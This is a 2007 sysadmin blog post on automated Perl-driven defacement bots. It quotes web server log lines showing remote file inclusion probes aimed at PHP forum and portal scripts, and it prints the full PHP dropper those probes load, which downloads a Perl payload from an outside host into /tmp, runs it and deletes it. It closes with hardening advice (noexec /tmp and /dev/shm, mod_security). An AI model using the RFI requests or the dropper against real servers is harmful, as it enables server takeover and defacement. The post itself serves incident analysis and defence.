<h1>Robots defacers</h1>
<p>vicm3, 10 July 2007. https://blografia.net/vicm3/2007/07/robots_defacers/</p>
<p>Lately I have been running into defacers and/or script kiddies who now have automated scripts (forgive the redundancy) written in Perl:</p>
<p>[code='Bash']
dominioatacado.com:75.126.134.16 - - [10/Jul/2007:01:34:30 -0500] "GET /guruforo/index.php/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://floydz.imess.net/cmd.txt? HTTP/1.1" 200 56485 "-" "libwww-perl/5.805"
dominioatacado.com:75.126.134.16 - - [10/Jul/2007:10:07:56 -0500] "GET /guruforo/index.php/MOD_forum_fields_parse.php?phpbb_root_path=http://floydz.imess.net/cmd.txt? HTTP/1.1" 200 56480 "-" "libwww-perl/5.805"
dominioatacado.com:64.92.199.49 - - [10/Jul/2007:09:18:29 -0500] "GET / HTTP/1.0" 200 8571 "-" "libwww-perl/5.805"
dominioatacado.com:64.92.199.37 - - [10/Jul/2007:09:24:19 -0500] "GET / HTTP/1.0" 200 8571 "-" "libwww-perl/5.805"
legiondominioatacado.com:81.34.160.119 - - [10/Jul/2007:05:49:59 -0500] "GET /perlyell.gif HTTP/1.0" 200 750 "http://www.legiondominioatacado.com/index3.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1)"
legiondominioatacado.com:201.159.1.60 - - [10/Jul/2007:17:58:35 -0500] "GET /perlyell.gif HTTP/1.1" 200 750 "http://www.legionadominioatacado.com/index3.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
dominioatacado.com:80.247.202.176 - - [10/Jul/2007:05:16:30 -0500] "GET /portal/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.eclypse.info/img/ec.gif? HTTP/1.1" 200 28 "-" "libwww-perl/5.803"
dominioatacado.com:80.247.202.176 - - [10/Jul/2007:05:16:34 -0500] "GET /portal/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.eclypse.info/img/ec.gif? HTTP/1.1" 200 28 "-" "libwww-perl/5.803"
dominioatacado.com:208.53.170.15 - - [10/Jul/2007:02:55:33 -0500] "GET /portal2//index2.php?showpage=http://85.114.143.143/daisy/robotto.txt?? HTTP/1.1" 200 604 "-" "libwww-perl/5.805"
dominioatacado.com:208.53.170.15 - - [10/Jul/2007:03:01:23 -0500] "GET /portal2//index2.php?showpage=http://85.114.143.143/daisy/robotto.txt?? HTTP/1.1" 200 604 "-" "libwww-perl/5.805"
dominioatacado.com:65.98.55.194 - - [10/Jul/2007:03:01:24 -0500] "GET /portal2//index2.php?showpage=http://85.114.143.143/daisy/robotto.txt?? HTTP/1.1" 200 604 "-" "libwww-perl/5.805"
[/code]</p>
<p>All of it with libwww-perl :D</p>
<p>And from there they go on to call shells, backdoors, bots and other nasties. Still, I found it rather interesting that they are now automating this, and that they even seem to have a batch of different probes for different scripts (in fact I only posted the ones that returned 202; I have a pile of 404s, but they would bloat this post).</p>
<p>Contents of http://85.114.143.143/daisy/robotto.txt:</p>
<p>[code='PHP']
// Dropper served by the URL above: every line tries a different download tool
// (curl, GET, wget, fetch) through a different PHP execution function, then
// runs whatever was fetched with perl and deletes it.
echo exec('cd /tmp;curl http://85.114.143.143/daisy/unix.txt -o b;perl b;rm b;');
echo exec('cd /tmp;GET http://85.114.143.143/daisy/unix.txt>b;perl b;rm b;');
echo exec('cd /tmp;wget http://85.114.143.143/daisy/unix.txt;mv unix.txt b;perl b;rm b;');
echo exec('cd /tmp;fetch http://85.114.143.143/daisy/unix.txt;mv unix.txt b;perl b;rm b;');
echo passthru('cd /tmp;fetch http://85.114.143.143/daisy/unix.txt;mv unix.txt b;perl b;rm b;');
echo passthru('cd /tmp;wget http://85.114.143.143/daisy/unix.txt;mv unix.txt b;perl b;rm b;');
echo passthru('cd /tmp;curl http://85.114.143.143/daisy/unix.txt -o b;perl b;rm b;');
echo passthru('cd /tmp;GET http://85.114.143.143/daisy/unix.txt>b;perl b;rm b;');
echo system('cd /tmp;curl http://85.114.143.143/daisy/unix.txt -o b;perl b;rm b;');
echo system('cd /tmp;GET http://85.114.143.143/daisy/unix.txt>b;perl b;rm b;');
echo system('cd /tmp;wget http://85.114.143.143/daisy/unix.txt;mv unix.txt b;perl b;rm b;');
echo system('cd /tmp;fetch http://85.114.143.143/daisy/unix.txt;mv unix.txt b;perl b;rm b;');
echo shell_exec('cd /tmp;curl http://85.114.143.143/daisy/unix.txt -o b;perl b;rm b;');
echo shell_exec('cd /tmp;GET http://85.114.143.143/daisy/unix.txt>b;perl b;rm b;');
echo shell_exec('cd /tmp;wget http://85.114.143.143/daisy/unix.txt;mv unix.txt b;perl b;rm b;');
echo shell_exec('cd /tmp;fetch http://85.114.143.143/daisy/unix.txt;mv unix.txt b;perl b;rm b;');
[/code]</p>
<p>Of course, much of this is stopped simply by having /tmp mounted noexec and nosuid, which has kept these scripts out; still, many people surely have not taken into account that lately /dev/shm can also be used to attempt the same thing (so it is not a bad idea to have both /tmp and /dev/shm as noexec and nosuid in fstab).</p>
<p>In any case, I wonder why mod_security has not made it into Etch. :/</p>